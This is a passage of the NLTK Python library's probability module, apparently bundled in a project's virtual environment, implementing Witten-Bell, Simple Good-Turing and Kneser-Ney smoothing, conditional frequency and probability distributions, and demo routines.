estimates sum to one, yielding: - *p = T / Z (N + T)*, if count = 0 - *p = c / (N + T)*, otherwise The parameters *T* and *N* are taken from the ``freqdist`` parameter (the ``B()`` and ``N()`` values). The normalizing factor *Z* is calculated using these values along with the ``bins`` parameter. :param freqdist: The frequency counts upon which to base the estimation. :type freqdist: FreqDist :param bins: The number of possible event types. This must be at least as large as the number of bins in the ``freqdist``. 
If None, then it's assumed to be equal to that of the ``freqdist`` :type bins: int """ assert bins is None or bins >= freqdist.B(),\ 'bins parameter must not be less than %d=freqdist.B()' % freqdist.B() if bins is None: bins = freqdist.B() self._freqdist = freqdist self._T = self._freqdist.B() self._Z = bins - self._freqdist.B() self._N = self._freqdist.N() # self._P0 is P(0), precalculated for efficiency: if self._N==0: # if freqdist is empty, we approximate P(0) by a UniformProbDist: self._P0 = 1.0 / self._Z else: self._P0 = self._T / float(self._Z * (self._N + self._T)) def prob(self, sample): # inherit docs from ProbDistI c = self._freqdist[sample] return (c / float(self._N + self._T) if c != 0 else self._P0) def max(self): return self._freqdist.max() def samples(self): return self._freqdist.keys() def freqdist(self): return self._freqdist def discount(self): raise NotImplementedError() def __repr__(self): """ Return a string representation of this ``ProbDist``. :rtype: str """ return '<WittenBellProbDist based on %d samples>' % self._freqdist.N() ##////////////////////////////////////////////////////// ## Good-Turing Probability Distributions ##////////////////////////////////////////////////////// # Good-Turing frequency estimation was contributed by Alan Turing and # his statistical assistant I.J. Good, during their collaboration in # the WWII. It is a statistical technique for predicting the # probability of occurrence of objects belonging to an unknown number # of species, given past observations of such objects and their # species. (In drawing balls from an urn, the 'objects' would be balls # and the 'species' would be the distinct colors of the balls (finite # but unknown in number). # # Good-Turing method calculates the probability mass to assign to # events with zero or low counts based on the number of events with # higher counts. It does so by using the adjusted count *c\**: # # - *c\* = (c + 1) N(c + 1) / N(c)* for c >= 1 # - *things with frequency zero in training* = N(1) for c == 0 # # where *c* is the original count, *N(i)* is the number of event types # observed with count *i*. We can think the count of unseen as the count # of frequency one (see Jurafsky & Martin 2nd Edition, p101). # # This method is problematic because the situation ``N(c+1) == 0`` # is quite common in the original Good-Turing estimation; smoothing or # interpolation of *N(i)* values is essential in practice. # # Bill Gale and Geoffrey Sampson present a simple and effective approach, # Simple Good-Turing. As a smoothing curve they simply use a power curve: # # Nr = a*r^b (with b < -1 to give the appropriate hyperbolic # relationship) # # They estimate a and b by simple linear regression technique on the # logarithmic form of the equation: # # log Nr = a + b*log(r) # # However, they suggest that such a simple curve is probably only # appropriate for high values of r. For low values of r, they use the # measured Nr directly. (see M&S, p.213) # # Gale and Sampson propose to use r while the difference between r and # r* is 1.96 greater than the standard deviation, and switch to r* if # it is less or equal: # # |r - r*| > 1.96 * sqrt((r + 1)^2 (Nr+1 / Nr^2) (1 + Nr+1 / Nr)) # # The 1.96 coefficient correspond to a 0.05 significance criterion, # some implementations can use a coefficient of 1.65 for a 0.1 # significance criterion. 
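#
# A small worked illustration (added here for clarity, not part of the
# original discussion): with N(1)=10, N(2)=5 and N(3)=3, the adjusted count
# for items seen twice is c* = (2+1) * N(3)/N(2) = 3 * 3/5 = 1.8, while the
# probability mass reserved for unseen items is N(1)/N = 10/N.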
# ##////////////////////////////////////////////////////// ## Simple Good-Turing Probablity Distributions ##////////////////////////////////////////////////////// @compat.python_2_unicode_compatible class SimpleGoodTuringProbDist(ProbDistI): """ SimpleGoodTuring ProbDist approximates from frequency to frequency of frequency into a linear line under log space by linear regression. Details of Simple Good-Turing algorithm can be found in: - Good Turing smoothing without tears" (Gale & Sampson 1995), Journal of Quantitative Linguistics, vol. 2 pp. 217-237. - "Speech and Language Processing (Jurafsky & Martin), 2nd Edition, Chapter 4.5 p103 (log(Nc) = a + b*log(c)) - http://www.grsampson.net/RGoodTur.html Given a set of pair (xi, yi), where the xi denotes the frequency and yi denotes the frequency of frequency, we want to minimize their square variation. E(x) and E(y) represent the mean of xi and yi. - slope: b = sigma ((xi-E(x)(yi-E(y))) / sigma ((xi-E(x))(xi-E(x))) - intercept: a = E(y) - b.E(x) """ SUM_TO_ONE = False def __init__(self, freqdist, bins=None): """ :param freqdist: The frequency counts upon which to base the estimation. :type freqdist: FreqDist :param bins: The number of possible event types. This must be larger than the number of bins in the ``freqdist``. If None, then it's assumed to be equal to ``freqdist``.B() + 1 :type bins: int """ assert bins is None or bins > freqdist.B(),\ 'bins parameter must not be less than %d=freqdist.B()+1' % (freqdist.B()+1) if bins is None: bins = freqdist.B() + 1 self._freqdist = freqdist self._bins = bins r, nr = self._r_Nr() self.find_best_fit(r, nr) self._switch(r, nr) self._renormalize(r, nr) def _r_Nr_non_zero(self): r_Nr = self._freqdist.r_Nr() del r_Nr[0] return r_Nr def _r_Nr(self): """ Split the frequency distribution in two list (r, Nr), where Nr(r) > 0 """ nonzero = self._r_Nr_non_zero() if not nonzero: return [], [] return zip(*sorted(nonzero.items())) def find_best_fit(self, r, nr): """ Use simple linear regression to tune parameters self._slope and self._intercept in the log-log space based on count and Nr(count) (Work in log space to avoid floating point underflow.) """ # For higher sample frequencies the data points becomes horizontal # along line Nr=1. To create a more evident linear model in log-log # space, we average positive Nr values with the surrounding zero # values. (Church and Gale, 1991) if not r or not nr: # Empty r or nr? return zr = [] for j in range(len(r)): i = (r[j-1] if j > 0 else 0) k = (2 * r[j] - i if j == len(r) - 1 else r[j+1]) zr_ = 2.0 * nr[j] / (k - i) zr.append(zr_) log_r = [math.log(i) for i in r] log_zr = [math.log(i) for i in zr] xy_cov = x_var = 0.0 x_mean = 1.0 * sum(log_r) / len(log_r) y_mean = 1.0 * sum(log_zr) / len(log_zr) for (x, y) in zip(log_r, log_zr): xy_cov += (x - x_mean) * (y - y_mean) x_var += (x - x_mean)**2 self._slope = (xy_cov / x_var if x_var != 0 else 0.0) if self._slope >= -1: warnings.warn('SimpleGoodTuring did not find a proper best fit ' 'line for smoothing probabilities of occurrences. ' 'The probability estimates are likely to be ' 'unreliable.') self._intercept = y_mean - self._slope * x_mean def _switch(self, r, nr): """ Calculate the r frontier where we must switch from Nr to Sr when estimating E[Nr]. 
""" for i, r_ in enumerate(r): if len(r) == i + 1 or r[i+1] != r_ + 1: # We are at the end of r, or there is a gap in r self._switch_at = r_ break Sr = self.smoothedNr smooth_r_star = (r_ + 1) * Sr(r_+1) / Sr(r_) unsmooth_r_star = 1.0 * (r_ + 1) * nr[i+1] / nr[i] std = math.sqrt(self._variance(r_, nr[i], nr[i+1])) if abs(unsmooth_r_star-smooth_r_star) <= 1.96 * std: self._switch_at = r_ break def _variance(self, r, nr, nr_1): r = float(r) nr = float(nr) nr_1 = float(nr_1) return (r + 1.0)**2 * (nr_1 / nr**2) * (1.0 + nr_1 / nr) def _renormalize(self, r, nr): """ It is necessary to renormalize all the probability estimates to ensure a proper probability distribution results. This can be done by keeping the estimate of the probability mass for unseen items as N(1)/N and renormalizing all the estimates for previously seen items (as Gale and Sampson (1995) propose). (See M&S P.213, 1999) """ prob_cov = 0.0 for r_, nr_ in zip(r, nr): prob_cov += nr_ * self._prob_measure(r_) if prob_cov: self._renormal = (1 - self._prob_measure(0)) / prob_cov def smoothedNr(self, r): """ Return the number of samples with count r. :param r: The amount of frequency. :type r: int :rtype: float """ # Nr = a*r^b (with b < -1 to give the appropriate hyperbolic # relationship) # Estimate a and b by simple linear regression technique on # the logarithmic form of the equation: log Nr = a + b*log(r) return math.exp(self._intercept + self._slope * math.log(r)) def prob(self, sample): """ Return the sample's probability. :param sample: sample of the event :type sample: str :rtype: float """ count = self._freqdist[sample] p = self._prob_measure(count) if count == 0: if self._bins == self._freqdist.B(): p = 0.0 else: p = p / (1.0 * self._bins - self._freqdist.B()) else: p = p * self._renormal return p def _prob_measure(self, count): if count == 0 and self._freqdist.N() == 0 : return 1.0 elif count == 0 and self._freqdist.N() != 0: return 1.0 * self._freqdist.Nr(1) / self._freqdist.N() if self._switch_at > count: Er_1 = 1.0 * self._freqdist.Nr(count+1) Er = 1.0 * self._freqdist.Nr(count) else: Er_1 = self.smoothedNr(count+1) Er = self.smoothedNr(count) r_star = (count + 1) * Er_1 / Er return r_star / self._freqdist.N() def check(self): prob_sum = 0.0 for i in range(0, len(self._Nr)): prob_sum += self._Nr[i] * self._prob_measure(i) / self._renormal print("Probability Sum:", prob_sum) #assert prob_sum != 1.0, "probability sum should be one!" def discount(self): """ This function returns the total mass of probability transfers from the seen samples to the unseen samples. """ return 1.0 * self.smoothedNr(1) / self._freqdist.N() def max(self): return self._freqdist.max() def samples(self): return self._freqdist.keys() def freqdist(self): return self._freqdist def __repr__(self): """ Return a string representation of this ``ProbDist``. :rtype: str """ return '<SimpleGoodTuringProbDist based on %d samples>'\ % self._freqdist.N() class MutableProbDist(ProbDistI): """ An mutable probdist where the probabilities may be easily modified. This simply copies an existing probdist, storing the probability values in a mutable dictionary and providing an update method. """ def __init__(self, prob_dist, samples, store_logs=True): """ Creates the mutable probdist based on the given prob_dist and using the list of samples given. These values are stored as log probabilities if the store_logs flag is set. 
:param prob_dist: the distribution from which to garner the probabilities :type prob_dist: ProbDist :param samples: the complete set of samples :type samples: sequence of any :param store_logs: whether to store the probabilities as logarithms :type store_logs: bool """ self._samples = samples self._sample_dict = dict((samples[i], i) for i in range(len(samples))) self._data = array.array(str("d"), [0.0]) * len(samples) for i in range(len(samples)): if store_logs: self._data[i] = prob_dist.logprob(samples[i]) else: self._data[i] = prob_dist.prob(samples[i]) self._logs = store_logs def samples(self): # inherit documentation return self._samples def prob(self, sample): # inherit documentation i = self._sample_dict.get(sample) if i is None: return 0.0 return (2**(self._data[i]) if self._logs else self._data[i]) def logprob(self, sample): # inherit documentation i = self._sample_dict.get(sample) if i is None: return float('-inf') return (self._data[i] if self._logs else math.log(self._data[i], 2)) def update(self, sample, prob, log=True): """ Update the probability for the given sample. This may cause the object to stop being the valid probability distribution - the user must ensure that they update the sample probabilities such that all samples have probabilities between 0 and 1 and that all probabilities sum to one. :param sample: the sample for which to update the probability :type sample: any :param prob: the new probability :type prob: float :param log: is the probability already logged :type log: bool """ i = self._sample_dict.get(sample) assert i is not None if self._logs: self._data[i] = (prob if log else math.log(prob, 2)) else: self._data[i] = (2**(prob) if log else prob) ##///////////////////////////////////////////////////// ## Kneser-Ney Probability Distribution ##////////////////////////////////////////////////////// # This method for calculating probabilities was introduced in 1995 by Reinhard # Kneser and Hermann Ney. It was meant to improve the accuracy of language # models that use backing-off to deal with sparse data. The authors propose two # ways of doing so: a marginal distribution constraint on the back-off # distribution and a leave-one-out distribution. For a start, the first one is # implemented as a class below. # # The idea behind a back-off n-gram model is that we have a series of # frequency distributions for our n-grams so that in case we have not seen a # given n-gram during training (and as a result have a 0 probability for it) we # can 'back off' (hence the name!) and try testing whether we've seen the # n-1-gram part of the n-gram in training. # # The novelty of Kneser and Ney's approach was that they decided to fiddle # around with the way this latter, backed off probability was being calculated # whereas their peers seemed to focus on the primary probability. # # The implementation below uses one of the techniques described in their paper # titled "Improved backing-off for n-gram language modeling." In the same paper # another technique is introduced to attempt to smooth the back-off # distribution as well as the primary one. There is also a much-cited # modification of this method proposed by Chen and Goodman. # # In order for the implementation of Kneser-Ney to be more efficient, some # changes have been made to the original algorithm. Namely, the calculation of # the normalizing function gamma has been significantly simplified and # combined slightly differently with beta. 
None of these changes affect the # nature of the algorithm, but instead aim to cut out unnecessary calculations # and take advantage of storing and retrieving information in dictionaries # where possible. @compat.python_2_unicode_compatible class KneserNeyProbDist(ProbDistI): """ Kneser-Ney estimate of a probability distribution. This is a version of back-off that counts how likely an n-gram is provided the n-1-gram had been seen in training. Extends the ProbDistI interface, requires a trigram FreqDist instance to train on. Optionally, a different from default discount value can be specified. The default discount is set to 0.75. """ def __init__(self, freqdist, bins=None, discount=0.75): """ :param freqdist: The trigram frequency distribution upon which to base the estimation :type freqdist: FreqDist :param bins: Included for compatibility with nltk.tag.hmm :type bins: int or float :param discount: The discount applied when retrieving counts of trigrams :type discount: float (preferred, but can be set to int) """ if not bins: self._bins = freqdist.B() else: self._bins = bins self._D = discount # cache for probability calculation self._cache = {} # internal bigram and trigram frequency distributions self._bigrams = defaultdict(int) self._trigrams = freqdist # helper dictionaries used to calculate probabilities self._wordtypes_after = defaultdict(float) self._trigrams_contain = defaultdict(float) self._wordtypes_before = defaultdict(float) for w0, w1, w2 in freqdist: self._bigrams[(w0,w1)] += freqdist[(w0, w1, w2)] self._wordtypes_after[(w0,w1)] += 1 self._trigrams_contain[w1] += 1 self._wordtypes_before[(w1,w2)] += 1 def prob(self, trigram): # sample must be a triple if len(trigram) != 3: raise ValueError('Expected an iterable with 3 members.') trigram = tuple(trigram) w0, w1, w2 = trigram if trigram in self._cache: return self._cache[trigram] else: # if the sample trigram was seen during training if trigram in self._trigrams: prob = (self._trigrams[trigram] - self.discount())/self._bigrams[(w0, w1)] # else if the 'rougher' environment was seen during training elif (w0,w1) in self._bigrams and (w1,w2) in self._wordtypes_before: aftr = self._wordtypes_after[(w0, w1)] bfr = self._wordtypes_before[(w1, w2)] # the probability left over from alphas leftover_prob = ((aftr * self.discount()) / self._bigrams[(w0, w1)]) # the beta (including normalization) beta = bfr /(self._trigrams_contain[w1] - aftr) prob = leftover_prob * beta # else the sample was completely unseen during training else: prob = 0.0 self._cache[trigram] = prob return prob def discount(self): """ Return the value by which counts are discounted. By default set to 0.75. :rtype: float """ return self._D def set_discount(self, discount): """ Set the value by which counts are discounted to the value of discount. 
:param discount: the new value to discount counts by :type discount: float (preferred, but int possible) :rtype: None """ self._D = discount def samples(self): return self._trigrams.keys() def max(self): return self._trigrams.max() def __repr__(self): ''' Return a string representation of this ProbDist :rtype: str ''' return '<KneserNeyProbDist based on {0} trigrams'.format(self._trigrams.N()) ##////////////////////////////////////////////////////// ## Probability Distribution Operations ##////////////////////////////////////////////////////// def log_likelihood(test_pdist, actual_pdist): if (not isinstance(test_pdist, ProbDistI) or not isinstance(actual_pdist, ProbDistI)): raise ValueError('expected a ProbDist.') # Is this right? return sum(actual_pdist.prob(s) * math.log(test_pdist.prob(s), 2) for s in actual_pdist) def entropy(pdist): probs = (pdist.prob(s) for s in pdist.samples()) return -sum(p * math.log(p,2) for p in probs) ##////////////////////////////////////////////////////// ## Conditional Distributions ##////////////////////////////////////////////////////// @compat.python_2_unicode_compatible class ConditionalFreqDist(defaultdict): """ A collection of frequency distributions for a single experiment run under different conditions. Conditional frequency distributions are used to record the number of times each sample occurred, given the condition under which the experiment was run. For example, a conditional frequency distribution could be used to record the frequency of each word (type) in a document, given its length. Formally, a conditional frequency distribution can be defined as a function that maps from each condition to the FreqDist for the experiment under that condition. Conditional frequency distributions are typically constructed by repeatedly running an experiment under a variety of conditions, and incrementing the sample outcome counts for the appropriate conditions. For example, the following code will produce a conditional frequency distribution that encodes how often each word type occurs, given the length of that word type: >>> from nltk.probability import ConditionalFreqDist >>> from nltk.tokenize import word_tokenize >>> sent = "the the the dog dog some other words that we do not care about" >>> cfdist = ConditionalFreqDist() >>> for word in word_tokenize(sent): ... condition = len(word) ... cfdist[condition][word] += 1 An equivalent way to do this is with the initializer: >>> cfdist = ConditionalFreqDist((len(word), word) for word in word_tokenize(sent)) The frequency distribution for each condition is accessed using the indexing operator: >>> cfdist[3] FreqDist({'the': 3, 'dog': 2, 'not': 1}) >>> cfdist[3].freq('the') 0.5 >>> cfdist[3]['dog'] 2 When the indexing operator is used to access the frequency distribution for a condition that has not been accessed before, ``ConditionalFreqDist`` creates a new empty FreqDist for that condition. """ def __init__(self, cond_samples=None): """ Construct a new empty conditional frequency distribution. In particular, the count for every sample, under every condition, is zero. 
:param cond_samples: The samples to initialize the conditional frequency distribution with :type cond_samples: Sequence of (condition, sample) tuples """ defaultdict.__init__(self, FreqDist) if cond_samples: for (cond, sample) in cond_samples: self[cond][sample] += 1 def __reduce__(self): kv_pairs = ((cond, self[cond]) for cond in self.conditions()) return (self.__class__, (), None, None, kv_pairs) def conditions(self): """ Return a list of the conditions that have been accessed for this ``ConditionalFreqDist``. Use the indexing operator to access the frequency distribution for a given condition. Note that the frequency distributions for some conditions may contain zero sample outcomes. :rtype: list """ return list(self.keys()) def N(self): """ Return the total number of sample outcomes that have been recorded by this ``ConditionalFreqDist``. :rtype: int """ return sum(fdist.N() for fdist in compat.itervalues(self)) def plot(self, *args, **kwargs): """ Plot the given samples from the conditional frequency distribution. For a cumulative plot, specify cumulative=True. (Requires Matplotlib to be installed.) :param samples: The samples to plot :type samples: list :param title: The title for the graph :type title: str :param conditions: The conditions to plot (default is all) :type conditions: list """ try: from matplotlib import pylab except ImportError: raise ValueError('The plot function requires matplotlib to be installed.' 'See http://matplotlib.org/') cumulative = _get_kwarg(kwargs, 'cumulative', False) conditions = _get_kwarg(kwargs, 'conditions', sorted(self.conditions())) title = _get_kwarg(kwargs, 'title', '') samples = _get_kwarg(kwargs, 'samples', sorted(set(v for c in conditions for v in self[c]))) # this computation could be wasted if not "linewidth" in kwargs: kwargs["linewidth"] = 2 for condition in conditions: if cumulative: freqs = list(self[condition]._cumulative_frequencies(samples)) ylabel = "Cumulative Counts" legend_loc = 'lower right' else: freqs = [self[condition][sample] for sample in samples] ylabel = "Counts" legend_loc = 'upper right' # percents = [f * 100 for f in freqs] only in ConditionalProbDist? kwargs['label'] = "%s" % condition pylab.plot(freqs, *args, **kwargs) pylab.legend(loc=legend_loc) pylab.grid(True, color="silver") pylab.xticks(range(len(samples)), [compat.text_type(s) for s in samples], rotation=90) if title: pylab.title(title) pylab.xlabel("Samples") pylab.ylabel(ylabel) pylab.show() def tabulate(self, *args, **kwargs): """ Tabulate the given samples from the conditional frequency distribution. 
:param samples: The samples to plot :type samples: list :param title: The title for the graph :type title: str :param conditions: The conditions to plot (default is all) :type conditions: list """ cumulative = _get_kwarg(kwargs, 'cumulative', False) conditions = _get_kwarg(kwargs, 'conditions', sorted(self.conditions())) samples = _get_kwarg(kwargs, 'samples', sorted(set(v for c in conditions for v in self[c]))) # this computation could be wasted condition_size = max(len("%s" % c) for c in conditions) print(' ' * condition_size, end=' ') for s in samples: print("%4s" % s, end=' ') print() for c in conditions: print("%*s" % (condition_size, c), end=' ') if cumulative: freqs = list(self[c]._cumulative_frequencies(samples)) else: freqs = [self[c][sample] for sample in samples] for f in freqs: print("%4d" % f, end=' ') print() # @total_ordering doesn't work here, since the class inherits from a builtin class def __le__(self, other): if not isinstance(other, ConditionalFreqDist): raise_unorderable_types("<=", self, other) return set(self.conditions()).issubset(other.conditions()) \ and all(self[c] <= other[c] for c in self.conditions()) def __lt__(self, other): if not isinstance(other, ConditionalFreqDist): raise_unorderable_types("<", self, other) return self <= other and self != other def __ge__(self, other): if not isinstance(other, ConditionalFreqDist): raise_unorderable_types(">=", self, other) return other <= self def __gt__(self, other): if not isinstance(other, ConditionalFreqDist): raise_unorderable_types(">", self, other) return other < self def __repr__(self): """ Return a string representation of this ``ConditionalFreqDist``. :rtype: str """ return '<ConditionalFreqDist with %d conditions>' % len(self) @compat.python_2_unicode_compatible class ConditionalProbDistI(dict): """ A collection of probability distributions for a single experiment run under different conditions. Conditional probability distributions are used to estimate the likelihood of each sample, given the condition under which the experiment was run. For example, a conditional probability distribution could be used to estimate the probability of each word type in a document, given the length of the word type. Formally, a conditional probability distribution can be defined as a function that maps from each condition to the ``ProbDist`` for the experiment under that condition. """ def __init__(self): raise NotImplementedError("Interfaces can't be instantiated") def conditions(self): """ Return a list of the conditions that are represented by this ``ConditionalProbDist``. Use the indexing operator to access the probability distribution for a given condition. :rtype: list """ return list(self.keys()) def __repr__(self): """ Return a string representation of this ``ConditionalProbDist``. :rtype: str """ return '<%s with %d conditions>' % (type(self).__name__, len(self)) class ConditionalProbDist(ConditionalProbDistI): """ A conditional probability distribution modeling the experiments that were used to generate a conditional frequency distribution. A ConditionalProbDist is constructed from a ``ConditionalFreqDist`` and a ``ProbDist`` factory: - The ``ConditionalFreqDist`` specifies the frequency distribution for each condition. - The ``ProbDist`` factory is a function that takes a condition's frequency distribution, and returns its probability distribution. A ``ProbDist`` class's name (such as ``MLEProbDist`` or ``HeldoutProbDist``) can be used to specify that class's constructor. 
The first argument to the ``ProbDist`` factory is the frequency distribution that it should model; and the remaining arguments are specified by the ``factory_args`` parameter to the ``ConditionalProbDist`` constructor. For example, the following code constructs a ``ConditionalProbDist``, where the probability distribution for each condition is an ``ELEProbDist`` with 10 bins: >>> from nltk.corpus import brown >>> from nltk.probability import ConditionalFreqDist >>> from nltk.probability import ConditionalProbDist, ELEProbDist >>> cfdist = ConditionalFreqDist(brown.tagged_words()[:5000]) >>> cpdist = ConditionalProbDist(cfdist, ELEProbDist, 10) >>> cpdist['passed'].max() 'VBD' >>> cpdist['passed'].prob('VBD') 0.423... """ def __init__(self, cfdist, probdist_factory, *factory_args, **factory_kw_args): """ Construct a new conditional probability distribution, based on the given conditional frequency distribution and ``ProbDist`` factory. :type cfdist: ConditionalFreqDist :param cfdist: The ``ConditionalFreqDist`` specifying the frequency distribution for each condition. :type probdist_factory: class or function :param probdist_factory: The function or class that maps a condition's frequency distribution to its probability distribution. The function is called with the frequency distribution as its first argument, ``factory_args`` as its remaining arguments, and ``factory_kw_args`` as keyword arguments. :type factory_args: (any) :param factory_args: Extra arguments for ``probdist_factory``. These arguments are usually used to specify extra properties for the probability distributions of individual conditions, such as the number of bins they contain. :type factory_kw_args: (any) :param factory_kw_args: Extra keyword arguments for ``probdist_factory``. """ self._probdist_factory = probdist_factory self._factory_args = factory_args self._factory_kw_args = factory_kw_args for condition in cfdist: self[condition] = probdist_factory(cfdist[condition], *factory_args, **factory_kw_args) def __missing__(self, key): self[key] = self._probdist_factory(FreqDist(), *self._factory_args, **self._factory_kw_args) return self[key] class DictionaryConditionalProbDist(ConditionalProbDistI): """ An alternative ConditionalProbDist that simply wraps a dictionary of ProbDists rather than creating these from FreqDists. """ def __init__(self, probdist_dict): """ :param probdist_dict: a dictionary containing the probdists indexed by the conditions :type probdist_dict: dict any -> probdist """ self.update(probdist_dict) def __missing__(self, key): self[key] = DictionaryProbDist() return self[key] ##////////////////////////////////////////////////////// ## Adding in log-space. ##////////////////////////////////////////////////////// # If the difference is bigger than this, then just take the bigger one: _ADD_LOGS_MAX_DIFF = math.log(1e-30, 2) def add_logs(logx, logy): """ Given two numbers ``logx`` = *log(x)* and ``logy`` = *log(y)*, return *log(x+y)*. Conceptually, this is the same as returning ``log(2**(logx)+2**(logy))``, but the actual implementation avoids overflow errors that could result from direct computation. 
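    A tiny doctest-style check (added for illustration; not part of the
    original documentation), passing base-2 log values directly:

    >>> add_logs(2.0, 2.0)   # log2(4) "+" log2(4) == log2(8)
    3.0
    >>> add_logs(0.0, 0.0)   # log2(1) "+" log2(1) == log2(2)
    1.0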
""" if (logx < logy + _ADD_LOGS_MAX_DIFF): return logy if (logy < logx + _ADD_LOGS_MAX_DIFF): return logx base = min(logx, logy) return base + math.log(2**(logx-base) + 2**(logy-base), 2) def sum_logs(logs): return (reduce(add_logs, logs[1:], logs[0]) if len(logs) != 0 else _NINF) ##////////////////////////////////////////////////////// ## Probabilistic Mix-in ##////////////////////////////////////////////////////// class ProbabilisticMixIn(object): """ A mix-in class to associate probabilities with other classes (trees, rules, etc.). To use the ``ProbabilisticMixIn`` class, define a new class that derives from an existing class and from ProbabilisticMixIn. You will need to define a new constructor for the new class, which explicitly calls the constructors of both its parent classes. For example: >>> from nltk.probability import ProbabilisticMixIn >>> class A: ... def __init__(self, x, y): self.data = (x,y) ... >>> class ProbabilisticA(A, ProbabilisticMixIn): ... def __init__(self, x, y, **prob_kwarg): ... A.__init__(self, x, y) ... ProbabilisticMixIn.__init__(self, **prob_kwarg) See the documentation for the ProbabilisticMixIn ``constructor<__init__>`` for information about the arguments it expects. You should generally also redefine the string representation methods, the comparison methods, and the hashing method. """ def __init__(self, **kwargs): """ Initialize this object's probability. This initializer should be called by subclass constructors. ``prob`` should generally be the first argument for those constructors. :param prob: The probability associated with the object. :type prob: float :param logprob: The log of the probability associated with the object. :type logprob: float """ if 'prob' in kwargs: if 'logprob' in kwargs: raise TypeError('Must specify either prob or logprob ' '(not both)') else: ProbabilisticMixIn.set_prob(self, kwargs['prob']) elif 'logprob' in kwargs: ProbabilisticMixIn.set_logprob(self, kwargs['logprob']) else: self.__prob = self.__logprob = None def set_prob(self, prob): """ Set the probability associated with this object to ``prob``. :param prob: The new probability :type prob: float """ self.__prob = prob self.__logprob = None def set_logprob(self, logprob): """ Set the log probability associated with this object to ``logprob``. I.e., set the probability associated with this object to ``2**(logprob)``. :param logprob: The new log probability :type logprob: float """ self.__logprob = logprob self.__prob = None def prob(self): """ Return the probability associated with this object. :rtype: float """ if self.__prob is None: if self.__logprob is None: return None self.__prob = 2**(self.__logprob) return self.__prob def logprob(self): """ Return ``log(p)``, where ``p`` is the probability associated with this object. 
:rtype: float """ if self.__logprob is None: if self.__prob is None: return None self.__logprob = math.log(self.__prob, 2) return self.__logprob class ImmutableProbabilisticMixIn(ProbabilisticMixIn): def set_prob(self, prob): raise ValueError('%s is immutable' % self.__class__.__name__) def set_logprob(self, prob): raise ValueError('%s is immutable' % self.__class__.__name__) ## Helper function for processing keyword arguments def _get_kwarg(kwargs, key, default): if key in kwargs: arg = kwargs[key] del kwargs[key] else: arg = default return arg ##////////////////////////////////////////////////////// ## Demonstration ##////////////////////////////////////////////////////// def _create_rand_fdist(numsamples, numoutcomes): """ Create a new frequency distribution, with random samples. The samples are numbers from 1 to ``numsamples``, and are generated by summing two numbers, each of which has a uniform distribution. """ import random fdist = FreqDist() for x in range(numoutcomes): y = (random.randint(1, (1 + numsamples) // 2) + random.randint(0, numsamples // 2)) fdist[y] += 1 return fdist def _create_sum_pdist(numsamples): """ Return the true probability distribution for the experiment ``_create_rand_fdist(numsamples, x)``. """ fdist = FreqDist() for x in range(1, (1 + numsamples) // 2 + 1): for y in range(0, numsamples // 2 + 1): fdist[x+y] += 1 return MLEProbDist(fdist) def demo(numsamples=6, numoutcomes=500): """ A demonstration of frequency distributions and probability distributions. This demonstration creates three frequency distributions with, and uses them to sample a random process with ``numsamples`` samples. Each frequency distribution is sampled ``numoutcomes`` times. These three frequency distributions are then used to build six probability distributions. Finally, the probability estimates of these distributions are compared to the actual probability of each sample. :type numsamples: int :param numsamples: The number of samples to use in each demo frequency distributions. :type numoutcomes: int :param numoutcomes: The total number of outcomes for each demo frequency distribution. These outcomes are divided into ``numsamples`` bins. :rtype: None """ # Randomly sample a stochastic process three times. fdist1 = _create_rand_fdist(numsamples, numoutcomes) fdist2 = _create_rand_fdist(numsamples, numoutcomes) fdist3 = _create_rand_fdist(numsamples, numoutcomes) # Use our samples to create probability distributions. pdists = [ MLEProbDist(fdist1), LidstoneProbDist(fdist1, 0.5, numsamples), HeldoutProbDist(fdist1, fdist2, numsamples), HeldoutProbDist(fdist2, fdist1, numsamples), CrossValidationProbDist([fdist1, fdist2, fdist3], numsamples), SimpleGoodTuringProbDist(fdist1), SimpleGoodTuringProbDist(fdist1, 7), _create_sum_pdist(numsamples), ] # Find the probability of each sample. vals = [] for n in range(1,numsamples+1): vals.append(tuple([n, fdist1.freq(n)] + [pdist.prob(n) for pdist in pdists])) # Print the results in a formatted table. 
    print(('%d samples (1-%d); %d outcomes were sampled for each FreqDist' %
           (numsamples, numsamples, numoutcomes)))
    print('='*9*(len(pdists)+2))
    FORMATSTR = '      FreqDist '+ '%8s '*(len(pdists)-1) + '|  Actual'
    print(FORMATSTR % tuple(repr(pdist)[1:9] for pdist in pdists[:-1]))

    print('-'*9*(len(pdists)+2))
    FORMATSTR = '%3d   %8.6f ' + '%8.6f '*(len(pdists)-1) + '| %8.6f'
    for val in vals:
        print(FORMATSTR % val)

    # Print the totals for each column (should all be 1.0)
    zvals = list(zip(*vals))
    sums = [sum(val) for val in zvals[1:]]
    print('-'*9*(len(pdists)+2))
    FORMATSTR = 'Total ' + '%8.6f '*(len(pdists)) + '| %8.6f'
    print(FORMATSTR % tuple(sums))
    print('='*9*(len(pdists)+2))

    # Display the distributions themselves, if they're short enough.
    if len("%s" % fdist1) < 70:
        print('  fdist1: %s' % fdist1)
        print('  fdist2: %s' % fdist2)
        print('  fdist3: %s' % fdist3)

    print()
    print('Generating:')
    for pdist in pdists:
        fdist = FreqDist(pdist.generate() for i in range(5000))
        print('%20s %s' % (pdist.__class__.__name__[:20], ("%s" % fdist)[:55]))
    print()

def gt_demo():
    from nltk import corpus
    emma_words = corpus.gutenberg.words('austen-emma.txt')
    fd = FreqDist(emma_words)
    sgt = SimpleGoodTuringProbDist(fd)
    print('%18s %8s  %14s'
          % ("word", "frequency", "SimpleGoodTuring"))
    fd_keys_sorted = (key for key, value in sorted(fd.items(), key=lambda item: item[1], reverse=True))
    for key in fd_keys_sorted:
        print('%18s %8d  %14e'
              % (key, fd[key], sgt.prob(key)))


if __name__ == '__main__':
    demo(6, 10)
    demo(5, 5000)
    gt_demo()

__all__ = ['ConditionalFreqDist', 'ConditionalProbDist', 'ConditionalProbDistI',
           'CrossValidationProbDist', 'DictionaryConditionalProbDist',
           'DictionaryProbDist', 'ELEProbDist', 'FreqDist', 'SimpleGoodTuringProbDist',
           'HeldoutProbDist', 'ImmutableProbabilisticMixIn',
           'LaplaceProbDist', 'LidstoneProbDist', 'MLEProbDist', 'MutableProbDist',
           'KneserNeyProbDist', 'ProbDistI', 'ProbabilisticMixIn', 'UniformProbDist',
           'WittenBellProbDist', 'add_logs', 'log_likelihood', 'sum_logs', 'entropy']
Reagankm/KnockKnock
venv/lib/python3.4/site-packages/nltk/probability.py
Python
gpl-2.0
83,570
